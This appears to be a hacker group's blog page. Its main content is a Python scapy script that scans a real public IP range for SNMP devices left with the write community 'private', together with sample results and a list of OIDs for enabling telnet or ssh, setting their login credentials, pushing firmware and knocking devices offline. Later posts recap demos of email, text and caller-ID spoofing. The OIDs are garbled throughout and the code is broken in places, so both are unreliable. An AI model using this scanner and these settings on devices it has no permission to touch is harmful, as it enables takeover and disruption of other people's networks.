Most of the crew will be in Vegas for DEFCON20 this year!!! Lets all get drunk and party! I will also be getting married while there to the super awesome cmoney!! For our brothers not going, we will be doing our best to drink your share of booze 🙂 I get the opportunity to speak on the DCG panel again this year so if you are at DC20 come check it out, me and other POCs will be laying down some knowledge for y’all. Also find me or other dc414 members so we can all party 😀 I will be taking lots of pictures and posting them on Twitter, Facebook, and G+ so be sure to check that shit out as well. See ya there.
At the last meeting dw5304 gave a demo on snmp scanning and gaining access to things you shouldn’t have access to with a few home brew windows apps he coded up. Its been a while since I messed with snmp but his demo got me back into it, so I made a little python script to scan subnets for open snmp servers with the read/write string set to private. Here is the code:
#! /usr/bin/env python
from scapy.all import *
base = "69.2.1." #IP range to scan minus the last octet.
f = open('/tmp/snmp_output.txt', 'w+')
for i in range(1, 255):
ip = base+str(i)
p = IP(dst=ip)/UDP(dport=161, sport=39445)/SNMP(community="private",PDU=SNMPget(id=1416992799, varbindlist=[SNMPvarbind(oid=ASN1_OID("126.96.36.199.188.8.131.52.0"))]))
pkt = sr1(p, timeout=1)
if pkt and pkt.sprintf("%IP.proto%") != "icmp":
p1 = pkt.sprintf("%SNMP.PDU%").split("ASN1_STRING['", 1)
p2 = p1.split("'", 1)
print pkt.sprintf("%IP.src%")+" - "+p2
f.write(pkt.sprintf("%IP.src%")+" - "+p2+"\n")
Its a little hacked together and could use improvement but it works “feel free to send in any improvements you make”. It puts all the found servers IPs in /tmp/snmp_output.txt along with their system description enumerated via snmp. Here is a sample output:
184.108.40.206 - Ruckus Wireless Inc (C) 2006
220.127.116.11 - Ruckus Wireless Inc (C) 2006
18.104.22.168 - Ruckus Wireless Inc (C) 2006
22.214.171.124 - Ruckus Wireless Inc (C) 2006
126.96.36.199 - Ruckus Wireless Inc (C) 2006
188.8.131.52 - Ruckus Wireless Inc (C) 2006
184.108.40.206 - 24-port 10/100 + 2-Port Gigabit Switch with WebView and PoE
220.127.116.11 - Product: GW 4 FXS;SW Version: 5.80A.023.006
Once you find a few servers you can do snmpwalks on them and scour it for juicy info.
Here are some good OIDs to look for and/or set: *found most of this online & got some from dw5304
ip.ipForwarding.0 <-this tells you if its forwarding packets or not "useful to DoS a device" 18.104.22.168.22.214.171.124.2.1.1 <-ipforwardingdest sysName.0 <-device name 126.96.36.199.4.1.44188.8.131.52.184.108.40.206.0 i 1 ... EnableTelnetServer. 220.127.116.11.4.1.4418.104.22.168.22.214.171.124.0....telnetIpStackInterfaces. 126.96.36.199.4.1.44188.8.131.52.184.108.40.206.0....telnetUserName.. 220.127.116.11.4.1.4418.104.22.168.22.214.171.124.0....telnetPassword.. 126.96.36.199.4.1.44188.8.131.52.184.108.40.206.0....telnetServerControl. 220.127.116.11.4.1.4418.104.22.168.22.214.171.124.0....telnetSessionIp. 126.96.36.199.4.1.44188.8.131.52.184.108.40.206.0....telnetSessionInProgress. 220.127.116.11.4.1.4418.104.22.168.22.214.171.124.0....telnetForceUserLogout. 126.96.36.199.188.8.131.52.0 = System Description 184.108.40.206.220.127.116.11.0 = Modem up time 18.104.22.168.2.1.4 = Some useful information (walk) 22.214.171.124.126.96.36.199.1.1.0 = HFC IP (getnext) 188.8.131.52.184.108.40.206.1.3.0 = HFC Subnet (getnext) 220.127.116.11.18.104.22.168.1.6.2= Mac 22.214.171.124.126.96.36.199.188.8.131.52.3.1 = Maximum upload bandwidth 184.108.40.206.220.127.116.11.18.104.22.168.5.1 = Maximum download bandwidth 22.214.171.124.126.96.36.199.188.8.131.52 = Current status (walk) 184.108.40.206.220.127.116.11.18.104.22.168 = Hosts behind modem 22.214.171.124.126.96.36.199.4.4.0 = TFTP Configuration file server IP 188.8.131.52.184.108.40.206.4.5.0 = Configuration file name 220.127.116.11.18.104.22.168.3.5.0 = Current firmware 22.214.171.124.126.96.36.199.4.2.0 = DHCP Server IP 188.8.131.52.184.108.40.206.4.3.0 = Time Server IP 220.127.116.11.18.104.22.168.22.214.171.124 = View Log (walk) 126.96.36.199.188.8.131.52.184.108.40.206.2.3 = Downstream Frequency 220.127.116.11.18.104.22.168.4.5.0 = Image File 22.214.171.124.126.96.36.199.3.1.1 = Learned MAC (Get Next) ---[ Read / Write OIDs 188.8.131.52.184.108.40.206.1.3.0 = Boot modem (1=boot now) 220.127.116.11.18.104.22.168.3.1.0 = TFTP Firmware server IP 22.214.171.124.126.96.36.199.3.2.0 = Firmware filename 188.8.131.52.184.108.40.206.3.3.0 = Firmware update status (1=update now, 2=update on boot,3=disable updates) 220.127.116.11.18.104.22.168.5.2.0 = SNMP Traps server IP (0.0.0.0 = disabled) 22.214.171.124.126.96.36.199.5.3.0 = SNMP Traps status (1=enabled, 4=disabled) 188.8.131.52.4.1.1184.108.40.206.1.14.0 = SNMP Port 220.127.116.11.4.1.118.104.22.168.1.15.0 = SNMP Traps port 22.214.171.124.4.1.1126.96.36.199.1.17.0 = HTML Server status (1=enabled, 2=disabled)Other OIDs 188.8.131.52.184.108.40.206.0 = modem type 220.127.116.11.18.104.22.168.4.0 = Cable Modem Serial Number 22.214.171.124.126.96.36.199.5.0 = Alternate OID for Config File 188.8.131.52.184.108.40.206.3.0 = Provisional Server 220.127.116.11.18.104.22.168.0 = Area String 22.214.171.124.126.96.36.199.1.3+(hfc ip) = Subnet Example 188.8.131.52.184.108.40.206.220.127.116.11.2418.104.22.168.22.214.171.124.126.96.36.199 = CPE USB MAC 188.8.131.52.184.108.40.206.1.6.1 = Cable Modem USB MAC 220.127.116.11.18.104.22.168.127.1.2.1.1.1.2 = Default Gateway MAC Address 22.214.171.124.126.96.36.199.127.1.1.3.1.6.1 = Max Burst Up 188.8.131.52.184.108.40.206.1.6.5 = CPE MAC 220.127.116.11.4.1.118.104.22.168.1.17.0Ii 1 or 0 enable or disable webif 22.214.171.124.4.1.44126.96.36.199.188.8.131.52 =”reflects the IP stack interfaces on which a ssh 184.108.40.206.4.1.44220.127.116.11.18.104.22.168 = "reflects the user name which will be allowed ssh access." 22.214.171.124.4.1.44126.96.36.199.188.8.131.52 = "reflects the password which will be allowed ssh access." 184.108.40.206.4.1.44220.127.116.11.18.104.22.168 = "start or stop the ssh server. 22.214.171.124.4.1.44126.96.36.199.188.8.131.52 =terminate ssh session
You can find a lot more online. Enjoy and happy hacking 🙂
July’s meeting was hot in more then one way! First I would like to thank genero again for his genorous donation for the raffle, which put a solid $200 in the 3d printer fund!! Also congrats to faraday for winning both the raffle and the Photoshop and WIN contest!! I know it took forever to pick a winner but we did it damnit 😛
ngharo started the demos off with talking about how he set up dc414’s new astrisk server using google voice as the SIP trunk! Then showed us how he set it up to use NMAP to scan IPs from asterisk and speak the results to you over the phone! Klaiviel took over and made Ngharo a case for his raspberry pi and a penny launcher with his sweet 3d printer. Then I stepped in and showed everyone how to send spoofed emails from the dc414 server using the email spoofer web app, then how to send spoofed txt messages using the same app 🙂 Then Tony used a SIP provider that allowed for spoofing CID to spoof a call to Vlad. Then dw5304 wowed us all with a SNMP scanner he made, showed us some of the results like accessing a routers, modems, and windmills!!
Here are some pics from the meeting thanx to cmoney and congrats to Castor for winning the dc414 free junk giveaway!
Here is Faraday with his raffle winnings!
Here is Castor and his free junk from dc414
Come party, video game style, at Bucketworks this Saturday, July 14th at 2PM.
BasementLAN only asks you bring $5 to donate to Bucketworks for electricity.
You can register at BasementLAN.org, or just show up 🙂